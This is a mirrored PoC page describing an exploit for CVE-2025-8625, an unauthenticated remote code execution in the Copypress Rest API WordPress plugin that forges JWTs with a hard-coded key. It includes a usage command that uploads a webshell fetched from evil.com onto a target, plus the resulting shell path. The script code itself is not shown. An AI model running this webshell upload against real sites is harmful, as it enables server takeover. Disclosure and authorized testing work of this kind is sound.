CVE-2025-8625 PoC — Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code E

Source

https://github.com/Nxploited/CVE-2025-8625

Associated Vulnerability

Title:Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution (CVE-2025-8625)
Description:The Copypress Rest API plugin for WordPress is vulnerable to Remote Code Execution via copyreap_handle_image() Function in versions 1.1 to 1.2. The plugin falls back to a hard-coded JWT signing key when no secret is defined and does not restrict which file types can be fetched and saved as attachments. As a result, unauthenticated attackers can forge a valid token to gain elevated privileges and upload an arbitrary file (e.g. a PHP script) through the image handler, leading to remote code execution.

Description

Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution

Readme

# CVE-2025-8625
Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution
# 🛡️ Copypress Rest API 1.1 - 1.2 RCE Exploit

## 📝 Description

The Copypress Rest API plugin for WordPress (versions 1.1 to 1.2) is vulnerable to **Remote Code Execution** via the `copyreap_handle_image()` function.  
The plugin uses a hard-coded JWT signing key when no secret is set and does not validate file types, allowing unauthenticated attackers to forge tokens and upload arbitrary files (such as PHP shells) through the image handler endpoint.

- **CVE:** CVE-2025-8625  
- **CVSS:** 9.8 (Critical)

---

## 🚀 Script Overview

**Script name:** `CVE-2025-8625.py`  
This Python script automates exploitation of the vulnerability, allowing you to generate a valid JWT, send a crafted request, and upload a malicious file (webshell) to the vulnerable WordPress site.

---

## ⚙️ Usage

```bash
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
```

- `-u` / `--url`: Target WordPress site URL
- `-shell` / `--shell`: Direct link to your webshell or malicious PHP file

**Example output:**
```
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
```

---

## 🏆 Features

- Generates a valid JWT using the plugin's hardcoded secret
- Bypasses authentication to upload arbitrary files
- Provides clear output for success/failure of exploitation
- Simple command-line interface

---

## 📂 Shell Upload Location

**Shell uploaded successfully! 🎉**  
Shell path example:

```
https://target.com/wp-content/uploads/2025/10/shell.php
```

---

## ⚠️ Disclaimer

This tool is for **educational and authorized penetration testing** purposes only.  
Usage against targets without explicit permission is illegal.

---

***By: Nxploited (Khaled Alenazi)***

File Snapshot


 [4.0K]  /data/pocs/48cd20fbf40e540570ec43376a45aaadb8d8f563
├── [2.6K]  CVE-2025-8625.py
├── [1.5K]  LICENSE
├── [1.9K]  README.md
└── [  17]  requirements.txt

1 directory, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!